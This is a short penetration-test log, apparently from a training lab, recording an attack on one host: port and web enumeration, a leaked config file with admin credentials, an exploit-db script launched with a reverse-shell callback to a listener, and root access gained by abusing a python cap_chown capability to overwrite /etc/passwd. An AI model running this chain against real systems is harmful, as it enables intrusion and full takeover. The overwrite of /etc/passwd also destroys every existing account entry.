Quick

๐Ÿงช Pentest Log: {{date:2025-08-26}}

๐Ÿ” Target Information

ip=10.11.1.20

๐Ÿ“ก Enumeration

๐Ÿ”Œ Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

wpscan --url http://$ip

Found txt config file under databse folder

http://10.11.1.20/database/config.php.txt

$config['login_email'] = "admin@localhost.local";
$config['login_pass'] = "admin123";

๐Ÿ’ฃ Exploitation

๐Ÿ“Œ Vulnerability Summary

๐Ÿš€ Exploit Execution

๐Ÿ”ง Exploit Method

Tool / Script Used:

https://www.exploit-db.com/exploits/49494

python3 49494.py http://$ip/admin.php/ admin@localhost.local admin123 172.16.1.2 80

python3 /home/kali/Documents/oscp/Shell\ Handler/penelope/penelope.py -p 80

๐Ÿงฌ Privilege Escalation

๐Ÿ‘ค Current Access

๐Ÿ” Enumeration

Binary Capabilities:

getcap -r / 2>/dev/null

found

/usr/bin/python3.8 = cap_chown+ep

๐Ÿ”“ Privilege Escalation Exploit

๐Ÿ“Œ Exploit Summary

๐Ÿ”ง Exploit Steps

python3 -c 'import os;os.chown("/etc/passwd",33,33)'

echo 'tony:$1$test$28Tmd0tsvqI1Eq.TDxcaq/:0:0:tony,,,:/root:/bin/bash' > /etc/passwd;
su tony